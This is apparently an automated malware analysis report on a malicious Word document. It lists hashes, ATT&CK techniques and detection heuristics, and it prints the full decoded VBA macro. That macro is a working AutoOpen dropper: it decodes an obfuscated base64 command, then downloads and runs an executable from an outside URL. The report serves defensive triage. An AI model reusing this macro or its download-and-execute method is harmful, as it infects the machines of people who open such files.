Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 547fa5597e9cd5ab…

MALICIOUS

Office (OOXML)

40.5 KB Created: 2015-06-22 15:33:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2015-10-01
MD5: d30378f334777d9d2a53521cbed06a60 SHA-1: 99b86e6ec47caab29141c5044f6dd8bad17a8307 SHA-256: 547fa5597e9cd5aba721fcc57b0bf4ba228f8f3aaca55bfcd856159458dc1492
372 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1105 Ingress Tool Transfer T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen subroutine that is designed to execute obfuscated code. This code attempts to download a file from 'http://directexe.com/6br/pym_phljn.exe' and save it as 'c:\users\public\documents\a.exe', then execute it. The obfuscation involves string concatenation and base64 decoding, making the exact command line difficult to reconstruct directly from the VBA source. The presence of WScript.Shell, MSXML2.XMLHTTP, Scripting.FileSystemObject, and ADODB.Stream objects indicates a high likelihood of downloading and executing a payload.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
  • VBA project inside OOXML medium 5 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    CreateObject("WScript.Shell").Run (Replace(c, "https://www.google.com/images/srpr/logo1w.png", e)), 0, True
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    CreateObject("WScript.Shell").Run (Replace(c, "https://www.google.com/images/srpr/logo1w.png", e)), 0, True
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("WScript.Shell").Run (Replace(c, "https://www.google.com/images/srpr/logo1w.png", e)), 0, True
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://directexe.com/6br/pym_phljn.exe Referenced by macro
    • http://directexe.coID=Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • https://www.google.com/images/srpr/logo1w.pngReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2292 bytes
SHA-256: 2c46d07b12ab2baa4c9ec8a6e9fa794284811bed5a8842f1b6d5e9da3600b57e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim a, b, c, d, e, f
Dim r
r = 0
r = 12333 + 1
e = "http://directexe.com/6br/pym_phljn.exe"
a = "Y21kLmV4ZSAvYyBjZCBjOlx1c2Vyc1xwdWJsaWNcZG9jdW1lbnRzICYgKGVjaG8gYSA9ICJodHRwczovL3d3dy5nb29nbGUuY29tL2ltYWdlcy9zcnByL2xvZ28xdy5wbmciICYgZWNobyBiID0gTWlkXihhLCBJblN0clJldl4oYSwgIi8iXikgXisgMSwgTGVuXihhXileKSAmIGVjaG8gU2V0IGMgPSBDcmVhdGVPYmplY3ReKCJNU1hNTDIuWE1MSFRUUCJeKSAmIGVjaG8gU2V0IGQgPSBDcmVhdGVPYmplY3ReKCJTY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCJeKSAmIGVjaG8gU2V0IGUgPSBDcmVhdGVPYmplY3ReKCJBRE9EQi5TdHJlYW0iXikgJiBlY2hvIFNldCBmID0gQ3JlYXRlT2JqZWN0XigiV1NjcmlwdC5TaGVsbCJeKSAmIGVjaG8gSWYgZC5GaWxlRXhpc3RzXihiXikgVGhlbiBkLkRlbGV0ZUZpbGVeKGJeKSAmIGVjaG8gYy5vcGVuICJHRVQiLCBhLCBGYWxzZSAmIGVjaG8gYy5zZW5kICYgZWNobyBJZiBjLlN0YXR1cyA9IDIwMCBUaGVuICYgZWNobyBXaXRoIGUgJiBlY2hvIC5UeXBlID0gMSAmI" + _
"GVjaG8gLk9wZW4gJiBlY2hvIC5Xcml0ZSBjLnJlc3BvbnNlQm9keSAmIGVjaG8gLlNhdmVUb0ZpbGUgYiAmIGVjaG8gLkNsb3NlICYgZWNobyBFbmQgV2l0aCAmIGVjaG8gSWYgZC5GaWxlRXhpc3RzXihiXikgVGhlbiAmIGVjaG8gZi5SdW5eKGJeKSAmIGVjaG8gRW5kIElmICYgZWNobyBFbmQgSWYgJiBlY2hvIGQuRGVsZXRlRmlsZV4oV1NjcmlwdC5TY3JpcHRGdWxsTmFtZV4pICYgZWNobyBTZXQgYyA9IE5vdGhpbmcgJiBlY2hvIFNldCBkID0gTm90aGluZyAmIGVjaG8gU2V0IGUgPSBOb3RoaW5nICYgZWNobyBTZXQgZiA9IE5vdGhpbmcpID4geC52YnMgJiBzdGFydCB4LnZicw==": f = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/": a = Replace(a, vbCrLf, ""): a = Replace(a, vbTab, ""): a = Replace(a, " ", ""): b = Len(a): For d = 1 To b Step 4
Dim g, h, i, j, k, l
g = 3
Dim x
x = 0
x = x + 1
k = 0
For h = 0 To 3
i = Mid(a, d + h, 1)
Dim y
y = 2
x = y + 1
If i = "=" Then
g = g - 1
j = 0
Else
j = InStr(1, f, i, vbBinaryCompare) - 1
End If
x = y + r - 1000 * 5 - r
k = 64 * k + j: Next
k = Hex(k)
k = String(6 - Len(k), "0") & k
l = Chr(CByte("&H" & Mid(k, 1, 2))) + Chr(CByte("&H" & Mid(k, 3, 2))) + Chr(CByte("&H" & Mid(k, 5, 2)))
c = c & Left(l, g)
Next
CreateObject("WScript.Shell").Run (Replace(c, "https://www.google.com/images/srpr/logo1w.png", e)), 0, True
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 11776 bytes
SHA-256: a276cdda1dd071f1c2fe06b895a1385d00c6955b97c590e87169eb8bed66ac04
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.